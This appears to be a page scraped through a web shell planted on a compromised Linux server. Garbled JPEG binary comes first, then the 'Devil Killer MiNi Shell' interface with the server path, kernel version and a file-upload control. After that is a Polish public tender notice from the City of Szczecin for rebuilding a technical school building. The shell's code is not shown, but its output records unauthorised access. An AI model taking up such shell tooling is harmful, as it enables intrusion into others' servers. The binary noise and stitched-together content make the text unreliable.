JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210713/0011235602-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00112356 z dnia 2021-07-13</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynku Technikum Technologii Cyfrowych polegająca na przebudowie poddasza na cele edukacyjne, wymianie stolarki okiennej, przebudowie instalacji sanitarnych i teletechnicznych (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO SZCZECIN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Biuro ds. Zamówień Publicznych Urzędu Miasta Szczecin</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684232</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Armii Krajowej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-456</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@um.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um.szczecin.pl/chapter_11760.asp</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynku Technikum Technologii Cyfrowych polegająca na przebudowie poddasza na cele edukacyjne, wymianie stolarki okiennej, przebudowie instalacji sanitarnych i teletechnicznych (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-575e1f22-d273-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00112356</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002480/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.42 Przebudowa budynku Technikum Technologii Cyfrowych (...)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/umszczecin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Z zastrzeżeniem art. 61 ust. 2 ustawy, komunikacja między zamawiającym a <br/>wykonawcami, w tym oferty oraz wszelkie oświadczenia, wnioski (w tym o <br/>wyjaśnienie treści SWZ), zawiadomienia i informacje przekazywane są <br/>wyłącznie poprzez ich złożenie na Platformie Portal Smart PZP (zwanej dalej: <br/>„Platformą”).<br/>2) Korespondencja przekazana zamawiającemu w inny sposób (np. listownie, <br/>mailem) nie będzie brana pod uwagę.<br/>3) Adres Platformy https://portal.smartpzp.pl/umszczecin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, składa się, pod <br/>rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego <br/>podpisu elektronicznego) lub w postaci elektronicznej opatrzonej podpisem <br/>zaufanym lub podpisem osobistym.<br/>2) Sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych <br/>środków dowodowych oraz innych dokumentów lub oświadczeń musi być zgody <br/>z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia <br/>30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji <br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia <br/>publicznego lub konkursie oraz w rozporządzeniu Ministra Rozwoju, Pracy i <br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków <br/>dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać <br/>zamawiający od wykonawcy.<br/>3) W celu złożenia oferty wykonawca zobowiązany jest założyć na Platformie<br/>konto użytkownika, jednocześnie wprowadzając do Platformy swój podmiot. <br/>Rejestracja na Platformie dostępna jest po kliknięciu przycisku „Załóż konto”. <br/>Szczegółowe informacje dot. sposobu wykonania ww. czynności znajdują się w <br/>„Instrukcji obsługi Portalu e-Usług SmartPZP”, dostępnej na <br/>stronie Platformy pod adresem:<br/>https://portal.smartpzp.pl/umszczecin/elearning<br/>4) Wykonawca może wycofać złożoną przez siebie ofertę przed upływem terminu <br/>składania ofert (ewentualna zmiana oferty odbywa się poprzez jej wycofanie <br/>oraz złożenie nowej oferty – z uwagi na zaszyfrowanie plików oferty brak jest <br/>możliwości edycji złożonej oferty). W tym celu wykonawca loguje się na <br/>Platformę, wyszukuje i wybiera dane postępowanie, a następnie po przejściu do <br/>zakładki „Oferta”, wycofuje ją przy pomocy przycisku „Wycofaj ofertę”. <br/>5) Wykonawca nie może wycofać oferty po upływie terminu składania ofert.<br/>6) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie <br/>wymaga posiadania konta na Platformie ani logowania do Platformy.<br/>7) Komunikacja wykonawcy z zamawiającym w postępowaniu odbywa się za <br/>pośrednictwem posiadanego na Platformie konta Użytkownika Zewnętrznego. <br/>Dotyczy to w szczególności: przekazywania dokumentów, oświadczeń, <br/>informacji, pytań i wniosków w ramach postępowania.<br/>8) Komunikacja zamawiającego z wykonawcą w postępowaniu odbywa się za <br/>pośrednictwem posiadanego na Platformie konta zamawiającego oraz kont jego <br/>Użytkowników Wewnętrznych. Dotyczy to w szczególności: przekazywania <br/>wezwań i zawiadomień, informacji i odpowiedzi na pytania. <br/>9) Zadawanie pytań przez wykonawców odbywa się w zakładce „Pytania do <br/>postępowania”. <br/>10) Po otwarciu ofert, komunikacja między zamawiającym a wykonawcami (w tym <br/>wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje), odbywa się za <br/>pośrednictwem Platformy, w zakładce „Korespondencja”.<br/>11) Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje <br/>się datę zapisania plików na serwerze. Aktualna data i godzina, <br/>zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym <br/>górnym rogu Platformy.<br/>12) Do pełnego i prawidłowego korzystania z Platformy przez Użytkowników <br/>Zewnętrznych konieczne jest posiadanie, przez co najmniej jednego <br/>uprawnionego Użytkownika Zewnętrznego wykonawcy, elektronicznego <br/>podpisu kwalifikowanego lub podpisu zaufanego lub podpisu osobistego,<br/>służącego do uwierzytelnienia i podpisu.<br/>Z uwagi na limit znaków pozostałe wymagania zawarte są w Rozdziale II SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP/27/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje wykonanie robót budowlanych pn. „Przebudowa budynku Technikum Technologii Cyfrowych polegająca na przebudowie poddasza na cele edukacyjne, wymianie stolarki okiennej, przebudowie instalacji sanitarnych i teletechnicznych oraz wymiana instalacji sanitarnych w budynku sali gimnastycznej przy ul. Niemierzyńskiej 17 w Szczecinie”.<br/>2. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">320 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których <br/>mowa w art. 214 ust. 1 pkt 7 ustawy, polegających na powtórzeniu podobnych <br/>robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego, do <br/>50 % wartości zamówienia podstawowego. Podstawą ustalenia warunków <br/>realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość kary umownej za przekroczenie terminu wykonania przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej<br/>określone warunki udziału w postępowaniu dotyczące:<br/><br/>1) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej lub <br/>finansowej zapewniającej należyte wykonanie zamówienia, jeżeli wykonawca <br/>wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie <br/>niższej niż 3 000 000 zł (trzy miliony złotych). <br/><br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia <br/>ww. warunek wykonawcy ci mogą spełniać łącznie.<br/><br/>2) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że wykonawca posiada wymagane zdolności techniczne lub <br/>zawodowe zapewniające należyte wykonanie zamówienia, jeżeli wykonawca <br/>wykaże, że:<br/>a) wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu <br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie, co najmniej dwie roboty budowlane o wartości nie mniejszej <br/>niż 7 000 000,00 zł brutto każda.<br/>Za jedną robotę budowlaną zamawiający uzna pracę polegającą na <br/>budowie lub przebudowie budynku użyteczności publicznej, obejmującą co najmniej roboty branży ogólnobudowlanej, sanitarnej i elektrycznej.<br/>Zamawiający uwzględni tylko zadania zakończone. <br/><br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie <br/>zamówienia ww. warunek wykonawcy ci mogą spełniać łącznie. <br/><br/>b) dysponuje lub będzie dysponować minimum po 1 (jednej) osobie<br/>(skierowanej przez wykonawcę do realizacji zamówienia) na każde z <br/>wymienionych poniżej stanowisk:<br/><br/>b1) Kierownik budowy:<br/>-posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>oraz<br/>- posiadający na dzień składania ofert co najmniej 5-letnie doświadczenie zawodowe (liczone od daty uzyskania ww. uprawnień), w tym pełnienie funkcji kierownika budowy lub kierownika robót lub inspektora nadzoru inwestorskiego na co najmniej dwóch robotach budowlanych o wartości co najmniej 5 000 000 zł brutto każda. Za jedną robotę budowlaną zamawiający uzna budowę lub przebudowę budynku użyteczności publicznej <br/>oraz<br/>- który brał udział przez co najmniej 18 miesięcy w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją kultury, zgodnie z ustawą z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami.<br/><br/>b2) Kierownik robót branży sanitarnej:<br/>- posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów uprawniające do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie instalacji cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych<br/>oraz<br/>- posiadający na dzień składania ofert co najmniej 5-letnie doświadczenie zawodowe (liczone od daty uzyskania ww. uprawnień); <br/><br/>b3) Kierownik robót branży elektrycznej:<br/>- posiadający uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, tj. do kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów uprawniające do <br/>kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych<br/>oraz<br/>- posiadający na dzień składania ofert co najmniej 5-letnie doświadczenie zawodowe (liczone od daty uzyskania ww. uprawnień).<br/><br/>Uwaga! Zamawiający dopuszcza możliwość łączenia stanowisk wymienionych <br/>w pkt 1 ppkt 2 lit. b1 - b3<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. warunek wykonawcy ci mogą spełniać łącznie.<br/><br/>2. Dodatkowe informacje dotyczące ww. warunków udziału w postępowaniu:<br/>1) wszystkie ww. osoby skierowane przez wykonawcę do realizacji zamówienia <br/>muszą biegle posługiwać się językiem polskim. W przeciwnym razie <br/>wykonawca udostępni wystarczającą ilość tłumaczy, wykazujących znajomość <br/>języka technicznego w zakresie terminologii budowlanej, we wszystkich <br/>specjalnościach występujących przy realizacji zamówienia,<br/>2) ilekroć w treści SWZ jest mowa o „uprawnieniach budowlanych”, „budowie”, <br/>„przebudowie”, „kierowniku budowy”, „kierowniku robót” należy pojęcia te <br/>rozumieć zgodnie z definicjami określonymi w ustawie Prawo budowlane oraz <br/>aktami wykonawczymi do niej,<br/>3) ilekroć w treści SWZ jest mowa o „budynku użyteczności publicznej” należy <br/>pojęcie to rozumieć zgodnie z definicją określoną w Rozporządzeniu Ministra <br/>Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, <br/>jakim powinny odpowiadać budynki i ich usytuowanie, <br/>4) roboty budowlane określone w pkt 1 ppkt 2 lit. a muszą być wykonane w <br/>ramach oddzielnych zadań (umów),<br/>5) jeżeli wykonawca lub podmiot udostępniający zasoby zrealizował zadanie w <br/>trybie zaprojektuj i wybuduj, zamawiający uzna robotę budowlaną za <br/>spełniającą warunek, jeżeli robota ta będzie odpowiadała swoim zakresem i <br/>wartością wymogom określonym w pkt 1 ppkt 2 lit. a,<br/>6) jeżeli wykonawca powołuje się na doświadczenie w realizacji robót <br/>budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz, o <br/>którym mowa w Rozdziale VI pkt 2 ppkt 2 (wykaz robót budowlanych), dotyczy <br/>robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio <br/>uczestniczył,<br/>7) w przypadku, gdy jakakolwiek wartość dotycząca ww. warunków wyrażona <br/>będzie w walucie obcej, zamawiający przeliczy tę wartość w oparciu o średni <br/>kurs walut NBP dla danej waluty z daty wszczęcia postępowania. Jeżeli w tym <br/>dniu średni kurs NBP nie będzie opublikowany zamawiający przyjmie średni <br/>kurs z ostatniego dnia przed dniem wszczęcia. Jeżeli w jakimkolwiek <br/>dokumencie złożonym przez wykonawcę wskazane zostaną kwoty wyrażone w <br/>walucie nie znajdującej się aktualnie w obrocie, zamawiający dokona <br/>przeliczenia tych kwot na złotówki na podstawie ostatniego średniego <br/>miesięcznego kursu złotego w stosunku do tych walut, ujawnionego w Tabeli <br/>Kursów Narodowego Banku Polskiego <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- zobowiązanie podmiotu udostępniającego zasoby do oddania <br/>wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji <br/>danego zamówienia wraz z oświadczeniem podmiotu udostępniającego <br/>zasoby, potwierdzającym brak podstaw wykluczenia tego podmiotu <br/>oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim <br/>wykonawca powołuje się na jego zasoby (wg wzoru stanowiącego załącznik <br/>nr 4 do SWZ). Zobowiązanie podmiotu udostępniającego zasoby może być <br/>zastąpione innym podmiotowym środkiem dowodowym potwierdzającym, że <br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi <br/>zasobami tego podmiotu;<br/>Uwaga! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na <br/>zdolnościach lub sytuacji podmiotu udostępniającego zasoby.<br/>- oświadczenie wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia wskazujące, które roboty budowlane, wykonają poszczególni <br/>wykonawcy, według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>Uwaga! Ww. dokument należy złożyć w przypadku wspólnego ubiegania się <br/>wykonawców o udzielenie zamówienia.<br/>- informacja banku lub spółdzielczej kasy oszczędnościowo – kredytowej <br/>potwierdzająca wysokość posiadanych środków finansowych lub zdolność <br/>kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej <br/>złożeniem;<br/>- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie <br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania <br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz <br/>załączeniem dowodów określających czy te roboty budowlane zostały <br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje <br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych <br/>od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie <br/>dokumenty;<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, <br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami <br/>na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i <br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także <br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> opis materiałów, produktów i rozwiązań równoważnych – jeżeli wykonawca <br/>przewiduje ich zastosowanie (w przypadku, o którym mowa w Rozdziale XVI pkt <br/>6 i 7 SWZ) oraz dokumenty na potwierdzenie równoważności zastosowanych <br/>materiałów, produktów i rozwiązań 